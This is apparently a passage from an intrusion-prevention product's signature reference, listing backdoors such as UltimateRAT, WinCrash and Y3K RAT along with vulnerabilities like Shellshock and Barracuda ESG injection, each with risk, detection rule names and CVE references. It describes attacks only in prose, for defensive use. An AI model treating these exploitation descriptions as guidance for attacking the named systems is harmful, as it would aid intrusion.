First detected in:	sgpkg-ips-250-3038
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	UltimateRAT is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_UltimateRAT-Request

Backdoor-Ultors

About this vulnerability:	Ultors backdoor activity
Risk:	High
First detected in:	sgpkg-ips-9-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows 95; Windows 98
Software:	Ultors
Type:	Backdoor
Description:	Ultors backdoor allows a remote attacker to control the infected system.
Situation:	BD-TCP_Ultors-Response

Backdoor-Undetected

About this vulnerability:	Undetected backdoor activity
Risk:	High
First detected in:	sgpkg-ips-11-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Undetected
Type:	Backdoor
Description:	Undetected is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Undetected-Response

Backdoor-Vagr-Nocker

About this vulnerability:	Vagr Nocker backdoor activity
Risk:	High
First detected in:	sgpkg-ips-11-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Vagr Nocker
Type:	Backdoor
Description:	Vagr Nocker is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Vagr-Nocker-Response

Backdoor-ValV-N.E.T

About this vulnerability:	Voodoo Doll backdoor
Risk:	High
First detected in:	sgpkg-ips-250-3038
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	ValV-N.E.t 2.0b1 is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program. ValV-N.E.t 2.0b1 is similar to NetBus as it is an old NetBus clone. The server and client are simply modifed versions of NetBus.
Situation:	BD-TCP_ValV-N.E.T-Request BD-TCP_Uploader-Request

Backdoor-Vampire

About this vulnerability:	Vampire backdoor activity
Risk:	High
First detected in:	sgpkg-ips-11-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Vampire
Type:	Backdoor
Description:	Vampire is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Vampire-Response

Backdoor-Voodoo-Doll

About this vulnerability:	Voodoo Doll backdoor
Risk:	High
First detected in:	sgpkg-ips-250-3038
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Voodoo Doll is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Voodoo-Doll-Backdoor

Backdoor-War-Trojan

About this vulnerability:	War Trojan backdoor
Risk:	High
First detected in:	sgpkg-ips-250-3038
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	WarTrojan is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_War-Trojan

Backdoor-Win-Mite-1

About this vulnerability:	Backdoor Windows Mite 1.0
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Windows Mite
Type:	Backdoor
Description:	Windows Mite 1.0 is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Win-Mite-1.0-Reply

Backdoor-WinCrash-1-03

About this vulnerability:	Backdoor WinCrash 1.03
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	WinCrash
Type:	Backdoor
Description:	WinCrash is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_WinCrash-1.03-Capslock BD-TCP_WinCrash-1.03-Banner

Backdoor-WinCrash-2-0

About this vulnerability:	Backdoor WinCrash 2.0
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	WinCrash
Type:	Backdoor
Description:	WinCrash is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_WinCrash-2.0-Connect BD-TCP_WinCrash-2.0-Banner

Backdoor-WinRAT-1

About this vulnerability:	Backdoor WinRAT 1.0
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	WinRAT
Type:	Backdoor
Description:	WinRAT 1.0 is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_WinRAT-1.0-Client-Connect

Backdoor-WinRAT-1-2

About this vulnerability:	Backdoor WinRAT 1.2
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	WinRAT
Type:	Backdoor
Description:	WinRAT 1.2 is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_WinRAT-1.2-Client-Connect BD-TCP_WinRAT-1.2-Taskbar BD-TCP_WinRAT-1.2-Taskbar-Reply

Backdoor-Wow23-03

About this vulnerability:	Backdoor Wow23 0.3
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Wow23
Type:	Backdoor
Description:	Wow23 is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	HTTP_BD-Wow32-Banner HTTP_CS-BD-Wow32-Connect HTTP_SHS-BD-Wow32-Banner

Backdoor-Xanadu-1-0

About this vulnerability:	Backdoor Xanadu 1.0
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Xanadu
Type:	Backdoor
Description:	Xanadu is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-UDP_Xanadu-1.0-Request BD-UDP_Xanadu-1.0-Reply

Backdoor-Xanadu-1-11

About this vulnerability:	Backdoor Xanadu 1.11
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Xanadu
Type:	Backdoor
Description:	Xanadu is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Xanadu-1.11-Client-Connect

Backdoor-XLog-2-2

About this vulnerability:	Xlog backdoor
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	XLog
Type:	Backdoor
Description:	Xlog is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program. This Xlog trojan is not related to the X11 Window system.
Situation:	BD-TCP_XLog-2.2-Connect BD-TCP_Backdoor-XLog-2.2-Banner-1

Backdoor-Y3K-RAT-1-1

About this vulnerability:	Backdooor Y3K RAT 1.1
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Y3K RAT
Type:	Backdoor
Description:	Y3K RAT is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-UDP_Y3K-RAT-1.1-Ping BD-UDP_Y3K-RAT-1.1-Confirm

Backdoor-Y3K-RAT-1-4

About this vulnerability:	Backdoor Y3K RAT 1.4
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Y3K RAT
Type:	Backdoor
Description:	Y3K RAT is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Y3K-RAT-1.4-Server-Banner-Detected BD-UDP_Y3K-RAT-1.4-Ping

Backdoor-Y3K-RAT-1-6

About this vulnerability:	Backdoor Y3K RAT 1.6
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Y3K RAT
Type:	Backdoor
Description:	Y3K RAT is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_Y3K-RAT-1.6-Server-Banner-Detected

Backdoor-YAT-2-1

About this vulnerability:	Backdoor YAT 2.1
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	YAT
Type:	Backdoor
Description:	YAT is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_YAT-2.1-Server-Banner-Detected

Backdoor-YAT-3-01

About this vulnerability:	Backdoor YAT 3.01
Risk:	High
First detected in:	sgpkg-ips-8-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	YAT
Type:	Backdoor
Description:	YAT is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a specific client program.
Situation:	BD-TCP_YAT-3.01-Startup-Command-Detected BD-TCP_YAT-3.01-Server-Banner-Detected BD-TCP_YAT-3.01-Startup-Command-Response

BACnet-OPC-Client-ActiveX-Control-Buffer-Overflow

About this vulnerability:

A vulnerability in BACnet OPC Client

Risk:

High

First detected in:

sgpkg-ips-609-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

BACnet OPC Client

Type:

Malfunction

Description:

There is a buffer overflow vulnerability in the WTclient.dll ActiveX control of SCADA Engine BACnet OPC Client which may allow remote attackers to execute arbitrary code via a long string parameter.

Situation:

File-Text_Multiple-ActiveX-Buffer-Overflow-Vulnerability-2
File-Text_Multiple-ActiveX-Buffer-Overflow-Vulnerabilities

References:

CVE-2010-4740
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4740

BID-43289
http://www.securityfocus.com/bid/43289

Badbox-Botnet-C2-Traffic

About this vulnerability:	BADBOX Botnet activity detected
Risk:	High
First detected in:	sgpkg-ips-1816-5242
Last changed:	sgpkg-ips-1846-5242
Platform:	Generic
Software:	BadBox Botnet
Type:	Backdoor
Description:	BadBox is a mobile malware, which is likely to be based on the "Triada" malware family. It is infecting mobile devices either through supply chain attacks on their firmware, shady employees, or through injections taking place as they enter the product distribution phase. The goal of the malware is to turn the device into a residential proxy or using it to perform ad fraud.
Situation:	HTTP_CSH-Badbox-Botnet-C2-Traffic

Bagle-Spambot

About this vulnerability:	Bagle spambot acts as a proxy to relay spam messages
Risk:	High
First detected in:	sgpkg-ips-269-3038
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Bagle spambot
Type:	Backdoor
Description:	Bagle spambot acts as a proxy to relay spam messages.
Situation:	HTTP_CRL-Bagle-Spambot

Baidu-Soba-Search-Bar-File-Download-And-Execute

About this vulnerability:

Arbitary file download and execute vulnerability in Baidu Soba Search Bar

Risk:

High

First detected in:

sgpkg-ips-133-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Baidu Soba Search Bar

Type:

Malfunction

Description:

There is an arbitrary file download and execute vulnerability in Baidu Soba Search Bar. The vulnerability allows arbitrary files to be downloaded and executed in the context of the current user.

Situation:

HTTP_SS-Baidu-Soba-Search-Bar-File-Download-And-Execute
File-Text_Baidu-Soba-Search-Bar-File-Download-And-Execute

References:

CVE-2007-4105
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4105

BID-25121
http://www.securityfocus.com/bid/25121

BakBone-NetVault-Heap-BOF

About this vulnerability:

BakBone NetVault Heap Buffer Overflow Vulnerability

Risk:

High

First detected in:

sgpkg-ips-25-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

BakBone NetVault

Type:

Buffer Overflow

Description:

BakBone NetVault suffers from a heap buffer overflow vulnerability, which could allow the attacker to compromise the server.

Situation:

Generic_BakBone-NetVault-Heap-BOF

References:

CVE-2005-1009
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1009

BID-12967
http://www.securityfocus.com/bid/12967

BakBone-NetVault-Heap-BOF-2

About this vulnerability:

BakBone NetVault Heap Buffer Overflow Vulnerability

Risk:

High

First detected in:

sgpkg-ips-164-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

BakBone NetVault

Type:

Buffer Overflow

Description:

BakBone NetVault suffers from a heap buffer overflow vulnerability, which could allow the attacker to compromise the server.

Situation:

Generic_BakBone-NetVault-Heap-BOF-2

References:

CVE-2005-1547
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1547

Baldr-Botnet-Panel-Shell-Upload-Exploit

About this vulnerability:	A vulnerability in Baldr stealer malware control panel.
Risk:	High
First detected in:	sgpkg-ips-1359-5242
Last changed:	sgpkg-ips-1359-5242
Platform:	Generic
Software:	Baldr stealer malware
Type:	Insecure Configuration
Description:	A vulnerability in the Baldr stealer malware control panel which allows remote attackers to upload PHP files in zip format in place of log file uploads.
Situation:	HTTP_CS-Baldr-Botnet-Panel-Shell-Upload-Exploit

Bankpatch-Trojan-Request

About this vulnerability:	Request generated by W32/Bankpatch trojna
Risk:	High
First detected in:	sgpkg-ips-204-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Malfunction
Description:	The W32/Bankpatch reports its status to a set of generated domains after it has infected a host. Presence of these requests indicate that there are infected systems in the network.
Situation:	HTTP_CS-Bankpatch-Trojan-Request

BaoFeng-Storm-ActiveX-Control-Multiple-Methods-Buffer-Overflow

About this vulnerability:

A vulnerability in BaoFeng Storm

Risk:

High

First detected in:

sgpkg-ips-124-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

BaoFeng Storm

Type:

Buffer Overflow

Description:

There are multiple buffer overflows in the BaoFeng Strom media player ActiveX component. The vulnerability allows arbitrary code execution in the context of the current user.

Situation:

HTTP_SS-BaoFeng-Storm-ActiveX-Control-Multiple-Methods-Buffer-Overflow
HTTP_SS-BaoFeng-Storm-ActiveX-Control-Multiple-Methods-Buffer-Overflow-2
File-Text_BaoFeng-Storm-ActiveX-Control-Multiple-Methods-Buffer-Overflow
File-Text_BaoFeng-Storm-ActiveX-Control-Multiple-Methods-Buffer-Overflow-2

References:

CVE-2007-4816
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4816

BID-25601
http://www.securityfocus.com/bid/25601

OSVDB-40491
http://www.osvdb.org/40491

Barco-WePresent-File_transfer.cgi-Command-Injection

About this vulnerability:

A vulnerability in Barco WePresent

Risk:

High

First detected in:

sgpkg-ips-1219-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux; Unix

Software:

Barco WePresent

Type:

Input Validation

Description:

There exists a vulnerability in multiple firmware versions of Barco WePresent routers which allows remote attackers to exexute arbitrary code due to the insufficient validation of user input to file_transfer.cgi.

Situation:

HTTP_CRL-Barco-WePresent-File_transfer.cgi-Command-Injection

References:

CVE-2019-3929
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3929

Bargain-Buddy

About this vulnerability:	Bargain Buddy
Risk:	Low
First detected in:	sgpkg-ips-35-1210
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Bargain Buddy
Type:	Misconfiguration
Description:	Bargain Buddy is a windows program that adds itself as plugins to browsers. It may show advertisements and may be considered unwanted software by some organizations.
Situation:	HTTP_CSU-Bargain-Buddy-Traffic HTTP_CSH-CashBack-Buddy-Activity HTTP_CSH-Bargain-Buddy-Install HTTP_CSH-Bargain-Buddy-Traffic

Barracuda-ESG-Archive-Name-Validation-Vulnerability-CVE-2023-2868

About this vulnerability:

An attempt to exploit a vulnerability in Barracuda Email Security Gateway detected

Risk:

High

First detected in:

sgpkg-ips-1605-5242

Last changed:

sgpkg-ips-1606-5242

Platform:

Generic

Software:

Barracuda Email Security Gateway

Type:

Input Validation

Description:

A remote command injection vulnerability exists in the Barracuda Email Security Gateway (appliance form factor only) product. The vulnerability arises out of a failure to comprehensively sanitize the processing of .tar file (tape archives). It stems from incomplete input validation of a user-supplied .tar file as it pertains to the names of the files contained within the archive. As a consequence, a remote attacker can specifically format these file names in a particular manner that will result in remotely executing a system command through Perl's qx operator with the privileges of the Email Security Gateway product.

Situation:

File-Binary_Suspicious-Long-Name-In-Gnu-Tar-Archive

References:

CVE-2023-2868
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2868

Barracuda-ESG-Parameter-Injection-CVE-2023-7102

About this vulnerability:

An attempt to exploit a vulnerability in Barracuda ESG detected

Risk:

High

First detected in:

sgpkg-ips-1670-5242

Last changed:

sgpkg-ips-1670-5242

Platform:

Generic

Software:

Barracuda ESG

Type:

Input Validation

Description:

The issue is related to the third-party library named Spreadsheet::ParseExcel, which is used by the Amavis scanner within the Barracuda Email Security Gateway to screen Microsoft Excel email attachments for malware. The library is vulnerable to an arbitrary code execution, allowing parameter injection attacks to Barracuda ESG appliances.

Situation:

File-OLE_Barracuda-ESG-Parameter-Injection-CVE-2023-7102
File-TextId_Barracuda-ESG-Parameter-Injection-CVE-2023-7102

References:

CVE-2023-7102
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-7102

Bash-Shellshock-Code-Injection

About this vulnerability:

A vulnerability in Bourne Again Shell (bash)

Risk:

High

First detected in:

sgpkg-ips-605-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

bash

Type:

Input Validation

Description:

There is a code injection vulnerbility in Bourne Again Shell (bash), widely used command interpreter. The vulnerability allows an attacker to execute arbitrary code in the affected system if the system passes a crafted user provided input to the command shell.

Situation:

Generic_UDP-Bash-Shellshock-Code-Injection
HTTP_CSU-Bash-Shellshock-Code-Injection
HTTP_CSH-Bash-Shellshock-Code-Injection
HTTP_CRL-Bash-Shellshock-Code-Injection
SMTP_Bash-Shellshock-Code-Injection
E-Mail_HCS-Bash-Shellshock-Code-Injection
FTP_CS-Bash-Shellshock-Code-Injection-2
FTP_CS-Bash-Shellshock-Code-Injection
BOOTP_CS-Bash-Shellshock-Code-Injection

References:

CVE-2014-6271
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271

OSVDB-112004
http://www.osvdb.org/112004

Basic-Analysis-And-Security-Engine-File-Include

About this vulnerability:

A Basic Analysis And Security Engine File Include vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-736-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Basic Analysis and Security Engine

Type:

Input Validation

Description:

A vulnerability in Basic Analysis and Security Engine, versions 1.2.4 and before, which allows remote attackers to execute arbitrary PHP code via a URL in the BASE_path parameter to base_qry_common.php, base_stat_common.php, and includes/base_include.inc.php.

Situation:

HTTP_CSU_Basic-Analysis-And-Security-Engine-File-Include

References:

CVE-2006-2685
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2685

BID-18298
http://www.securityfocus.com/bid/18298

OSVDB-49366
http://www.osvdb.org/49366

Bazar-Loader-Backdoor-Malware-Infection-Traffic

About this vulnerability:	Bazar Loader or Bazar Backdoor malware infection traffic detected
Risk:	High
First detected in:	sgpkg-ips-1314-5242
Last changed:	sgpkg-ips-1318-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Bazar Loader or Bazar Backdoor malware infection traffic was detected.
Situation:	HTTP_CSU-Bazar-Backdoor-Malware-Infection-Traffic HTTP_CSH-Bazar-Loader-Backdoor-Malware-Infection-Traffic

Bbcode-e107-Remote-Code-Execution-Vulnerability

About this vulnerability:

Arbitrary remote php code execution vulnerability in e107

Risk:

High

First detected in:

sgpkg-ips-336-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

e107

Type:

Input Validation

Description:

There is a vulnerability in bbcode/php.bb in e107 0.7.20. The vulnerability is due to an insufficient input validation, leading to execution of arbitary code in the context of the web server.

Situation:

HTTP_CRL-e107-Contact-Php-Remote-Code-Execution
HTTP_CRL-e107-Contact-Php-Remote-Code-Execution-2

References:

CVE-2010-2099
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2099

BID-40252
http://www.securityfocus.com/bid/40252

BBShop-Remote-File-Inclusion

About this vulnerability:	Remote file inclusion Vulnerability in BBShop
Risk:	High
First detected in:	sgpkg-ips-196-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	BBShop
Type:	Input Validation
Description:	There is a remote file inclusion vulnerability in BBShop web shop application written in PHP scripting language. The application does not validate parameters correctly, allowing injection and execution of arbitary code into the context of the web server.
Situation:	HTTP_CSU-BBShop-Remote-File-Inclusion

Bea-WebLogic-SSL-Handling-Denial-Of-Service

About this vulnerability:

A vulnerability in BEA Systems WebLogic

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

BEA WebLogic

Type:

Malfunction

Description:

There is a vulnerability in the way BEA System's WebLogic products handle SSL connections. An attacker can use this vulnerability to exhaust all available sockets, causing a Denial of Service condition. The attack target does not completely close an SSL connection and free its associated objects because the close process is interrupted by the exception triggered by the attacker's disconnect. When repeated multiple times, this eventually will cause the server to be unable to receive any new SSL requests, due to socket exhaustion, as well as resulting in a small memory leak. This will eventually result in a denial of service condition. Note: During testing, we were unable to exhaust all available sockets. However, the server did eventually crash due to memory exhaustion, as a result of the memory leak.

Situation:

Generic_CS-Bea-WebLogic-SSL-Handling-Denial-Of-Service
TLS_CS-Bea-WebLogic-SSL-Handling-Denial-Of-Service

References:

CVE-2004-2424
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2424

BID-10544
http://www.securityfocus.com/bid/10544

OSVDB-7076
http://www.osvdb.org/7076

Beacon-Remote-File-Inclusion

About this vulnerability:

Remote file inclusion Vulnerability in Beacon

Risk:

High

First detected in:

sgpkg-ips-196-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Beacon

Type:

Input Validation

Description:

There is a remote file inclusion vulnerability in Beacon content publishing system written in PHP scripting language. Particular script included within Beacon does not validate its parameters correctly, allowing injection and execution of arbitary code into the context of the web server.

Situation:

HTTP_CSU-Beacon-Remote-File-Inclusion

References:

CVE-2007-2663
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2663

BID-23959
http://www.securityfocus.com/bid/23959

OSVDB-37816
http://www.osvdb.org/37816

Beck-Gmbh-IPC@CHIP-Conf-File-Discosure

About this vulnerability:

Beck Gmbh IPC@CHIP allows php.ini file (containing passwords) reading in unauth manner.

Risk:

High

First detected in:

sgpkg-ips-629-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Beck GmbH IPC@CHIP

Type:

Malfunction

Description:

A vulnerability in Beck IPC GmbH IPC@CHIP Embedded-Webserver which allows remote attackers to read files via a webserver root directory set to system root, disclosing passwords.

Situation:

HTTP_CSU-Beck-Gmbh-IPC@CHIP-Conf-File-Discosure

References:

CVE-2001-0749
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0749

BID-2775
http://www.securityfocus.com/bid/2775

Beck-Gmbh-IPC@CHIP-Denial-of-Service

About this vulnerability:	Beck Gmbh IPC@CHIP Denial of Service.
Risk:	High
First detected in:	sgpkg-ips-628-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Beck GmbH IPC@CHIP
Type:	Malfunction
Description:	A vulnerability in Beck Gmbh IPC@Chip that allows a remote attacker to crash the service by sending the specially crafted tcp packet.
Situation:	HTTP_CSU-Beck-Gmbh-IPC@CHIP-Denial-of-Service

Beck-Gmdg-IPC@CHIP-Configuration-File-Disclosure

About this vulnerability:

A vulnerability in Beck GmbH IPC@CHIP

Risk:

High

First detected in:

sgpkg-ips-609-5211

Last changed:

sgpkg-ips-1640-5242

Platform:

Generic

Software:

Beck GmbH IPC@CHIP

Type:

Malfunction

Description:

There is a file disclosure vulnerability in Beck GmbH IPC@CHIP which allows an attacker to read the configuration file in an unauthenticated manner.

Situation:

HTTP_CSU-Beck-Gmbh-IPC@CHIP-Conf-File-Discosure

References:

CVE-2001-0749
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0749

BID-2775
http://www.securityfocus.com/bid/2775

Beck-Ipc-Chip-HTTP-Denial-Of-Service

About this vulnerability:	A vulnerability in Beck Ipc@Chip
Risk:	High
First detected in:	sgpkg-ips-612-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows;Linux
Software:	Beck GmbH IPC@CHIP
Type:	Malfunction
Description:	A vulnerability exists in Beck IPC@Chip. An attacker could send a custom HTTP request causing a denial of service condition.
Situation:	HTTP_CRL-Beck-Ipc-Chip-HTTP-Denial-Of-Service

Beckhoff-Twincat-DoS

About this vulnerability:

A vulnerability in Beckhoff TwinCAT

Risk:

High

First detected in:

sgpkg-ips-610-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Beckhoff TwinCAT

Type:

Input Validation

Description:

A specially crafted UDP packet can be used to crash TcatSysSrv.exe, causing a denial of service situation.

Situation:

Generic_UDP-Beckhoff-Twincat-DoS

References:

CVE-2011-3486
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3486

OSVDB-75495
http://www.osvdb.org/75495

Belkin-N750-MiniHttpd-Buffer-Overflow

About this vulnerability:

A Belkin N750 MiniHttpd Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-698-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Belkin MiniHttpd

Type:

Input Validation

Description:

A buffer overflow vulnerability in Belkin N750 Router in MiniHttpd, firmware versions before F9K1103_WW_1.10.17m, which allows remote attackers to execute arbitrary code in login.cgi via a long string in the jump parameter.

Situation:

HTTP_CRL_Belkin-N750-MiniHttpd-Buffer-Overflow

References:

CVE-2014-1635
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1635

BID-70977
http://www.securityfocus.com/bid/70977

OSVDB-114345
http://www.osvdb.org/114345

Belkin-Wemo-UPnP-RCE-CVE-2018-6692

About this vulnerability:

A vulnerability in Belkin Wemo

Risk:

High

First detected in:

sgpkg-ips-1324-5242

Last changed:

sgpkg-ips-1324-5242

Platform:

Linux; Unix

Software:

Belkin Wemo

Type:

Input Validation

Description:

There exists a buffer overflow vulnerability in libUPnPHndlr.so in Belkin Wemo Insight Smart Plug. A successful exploitation of this vulnerability can lead to arbitrary code execution.

Situation:

File-TextId_Belkin-Wemo-UPnP-RCE-CVE-2018-6692

References:

CVE-2018-6692
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6692

Belkin-Wemo-UPnP-Remote-Code-Execution

About this vulnerability:	A vulnerability in Belkin Wemo
Risk:	High
First detected in:	sgpkg-ips-1202-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Linux; Unix
Software:	Belkin Wemo
Type:	Input Validation
Description:	A vulnerability in Belkin Wemo which allows remote attackers to execute arbitrary code due to insufficient validation of the SmartDevURL parameter.
Situation:	HTTP_CSU-Belkin-Wemo-UPnP-Remote-Code-Execution

Bennet-Tec-TList-ActiveX-SaveData-Arbitrary-File-Creation

About this vulnerability:	A vulnerability in Bennet-Tec TList
Risk:	Moderate
First detected in:	sgpkg-ips-424-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Bennet-Tec TList; Oracle Hyperion Financial Management
Type:	Directory Traversal
Description:	An insecure method is exposed by Bennet-Tec's TList ActiveX control. The vulnerability is caused due to the TList.TList.[6-8] (TList[6-8].ocx) control including the insecure "SaveData" method. This can be exploited to create or rewrite arbitrary files in the context of the currently logged-on user. A remote attacker could possibly exploit this vulnerability to achieve arbitrary code execution by enticing a target user to open a crafted web page.
Situation:	File-Text_Bennet-Tec-TList-ActiveX-SaveData-Arbitrary-File-Creation

BentoML-RCE-CVE-2025-27520

About this vulnerability:

A vulnerability in BentoML

Risk:

High

First detected in:

sgpkg-ips-1870-5242

Last changed:

sgpkg-ips-1870-5242

Platform:

Generic

Software:

BentoML

Type:

Input Validation

Description:

An vulnerability in BentoML, version v1.4.2, which allows remote attackers to execute arbitrary code on the server through maliciously crafted serialized data.

Situation:

File-Text_BentoML-RCE-CVE-2025-27520

References:

CVE-2025-27520
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27520

BentoML-Runner-Server-RCE-CVE-2025-32375

About this vulnerability:

A vulnerability in BentoML

Risk:

High

First detected in:

sgpkg-ips-1870-5242

Last changed:

sgpkg-ips-1870-5242

Platform:

Generic

Software:

BentoML

Type:

Input Validation

Description:

An vulnerability in BentoML, versions before v1.4.8, which allows remote attackers to execute arbitrary code on the server through maliciously crafted serialized data by setting specific headers and parameters in the POST request.

Situation:

File-Text_BentoML-Runner-Server-RCE-CVE-2025-32375

References:

CVE-2025-32375
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-32375

Berlios-GPSD-Format-String-Vulnerability

About this vulnerability:

A Berlios GPSD Format String vulnerability.

Risk:

High

First detected in:

sgpkg-ips-739-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Berlios GPSD

Type:

Input Validation

Description:

A vulnerability in Berlios GPSD, versions 1.9.0 through 2.7, which allows remote attackers to execute arbitrary code via certain GPS requests containing format string specifiers.

Situation:

Generic_CS-Berlios-GPSD-Format-String-Vulnerability

References:

CVE-2004-1388
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1388

BID-12371
http://www.securityfocus.com/bid/12371

OSVDB-13199
